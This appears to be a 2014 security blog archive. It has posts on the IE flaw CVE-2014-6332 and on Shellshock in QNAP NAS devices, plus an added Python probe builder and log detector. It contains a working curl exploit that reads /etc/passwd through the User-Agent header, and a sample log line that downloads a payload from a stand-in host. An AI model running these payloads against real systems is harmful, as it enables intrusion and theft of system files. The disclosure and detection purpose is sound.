Monthly Archives: November 2014

CVE-2014-6332: it’s raining shells

This is a shared post by me (@wez3forsec) and Rik van Duijn (@rikvduijn)

Today @yuange tweeted a proof of concept for CVE-2014-6332, a critical Internet Explorer vulnerability that was patched with MS14-064. The PoC was able to execute notepad.exe. We wanted to pop some actual shells with this, so the race began to find a way of executing more than just notepad or calc. The "great" thing is that this vulnerability affects everything from Windows 95 with IE 3.0 up to Windows 10 with IE 11: from a pentester's perspective this is awesome, from a blue team perspective this will make you cry.

Because we wanted to pop shells we created a Metasploit module. This lets us adapt the exploit when needed and gives us the usability of the Metasploit framework, including the ability to launch the many different payloads the framework supports.

Shellshock: a lot of QNAP’s still vulnerable

Shellshock is a critical bug in Bash, a shell used on many Unix-based operating systems. Shellshock was disclosed on the 24th of September 2014, and the bug was assigned CVE-2014-6271. Analysis of the source code history of Bash shows the vulnerability had existed since version 1.03 of Bash, released in September 1989.

QNAP's Network Attached Storage (NAS) devices are vulnerable to Shellshock. The CGI handler passes request headers to bash as environment variables, so a header value that starts with a function definition gets the trailing command executed on the NAS. The vulnerability can be exploited by, for example, executing the following curl command, which puts the payload in the User-Agent header:

curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" http://ip:8080/cgi-bin/authLogin.cgi -v

There are two solutions offered by QNAP to fix this vulnerability:

  • Install firmware QTS 4.1.1 Build 1003
  • Install Qfix patch 1.0.1 (QTS 4.1.1 only) or 1.0.2 (QTS 3.8.x, QTS 4.0.x, QTS 4.1.0, QTS 4.1.1)
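To make the mechanism behind the curl command above concrete, here is an added example (our own illustration, not code from the original post or from QNAP) that builds the same kind of probe header with a non-destructive marker instead of cat /etc/passwd, classifies a captured response, flags Shellshock attempts in web server log lines, and runs the classic local bash self-test. The marker string, the host names and the log lines are constructed for the example.

```python
"""Shellshock (CVE-2014-6271) probe builder, response classifier and log detector.

Added example, not code from the original post. MARKER, SAMPLE_LOG and the
addresses in it are constructed for illustration.
"""
import re
import subprocess

MARKER = "SHELLSHOCK_PROBE_7f3a"  # constructed, arbitrary marker string


def shellshock_header(command, header="User-Agent"):
    """Build the single request header that carries the Shellshock payload.

    A vulnerable bash imports any environment variable whose value starts
    with "() {" as a function definition and keeps parsing past the closing
    brace, so the trailing command runs as soon as bash starts. A CGI
    handler exports request headers as environment variables (User-Agent
    becomes HTTP_USER_AGENT), which is what the curl command relies on.
    """
    return {header: "() { :; }; " + command}


def probe_command():
    """Command for a non-destructive check.

    The first echo emits the blank line that terminates the CGI header
    block, so the marker lands in the HTTP body instead of being discarded
    as a malformed header line. `cat /etc/passwd` works too, but a unique
    marker avoids false positives on pages that happen to contain "root:".
    """
    return "echo; echo " + MARKER


def is_vulnerable(response_body):
    """True if the response to the probe shows the injected command ran."""
    return MARKER in response_body


# Bash accepts whitespace between the tokens, so "( ) {" must match as
# well as "() {". Any header is a candidate, not only User-Agent.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def find_shellshock_attempts(log_lines):
    """Return the request log lines that carry the function-import trigger."""
    return [line for line in log_lines if SHELLSHOCK_RE.search(line)]


def local_bash_vulnerable(bash="bash"):
    """Classic local self-test. Returns True/False, or None if bash is absent.

    Bash is started with an environment variable holding a function
    definition followed by a trailing command. A patched bash ignores the
    trailing command (and only imports functions from BASH_FUNC_* variables);
    an unpatched one prints "vulnerable" before running the -c script.
    """
    env = {"x": "() { :; }; echo vulnerable",
           "PATH": "/usr/local/bin:/usr/bin:/bin"}
    try:
        out = subprocess.run([bash, "-c", "echo probe"], env=env,
                             capture_output=True, text=True, timeout=10)
    except FileNotFoundError:
        return None
    return "vulnerable" in out.stdout


# Constructed access-log lines in combined format: two carry the trigger
# (one with extra whitespace), one is an ordinary browser request.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Sep/2014:10:01:02 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" '
    '200 512 "-" "() { :; }; /bin/cat /etc/passwd"',
    '10.0.0.6 - - [25/Sep/2014:10:01:03 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/32.0"',
    '10.0.0.7 - - [25/Sep/2014:10:01:04 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" '
    '200 512 "-" "( ) { x;}; wget http://evil.example/b"',
]


if __name__ == "__main__":
    print("probe header:", shellshock_header(probe_command()))
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print("shellshock attempt:", hit)
    print("local bash vulnerable:", local_bash_vulnerable())
```

The header from shellshock_header(probe_command()) can be sent with any HTTP client to a CGI endpoint such as /cgi-bin/authLogin.cgi; is_vulnerable() on the body then gives a clean yes/no. The log regex is intentionally loose; on a real proxy or web server it should be run over all request headers, not just the User-Agent column, because Referer, Cookie and custom headers reach bash the same way.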
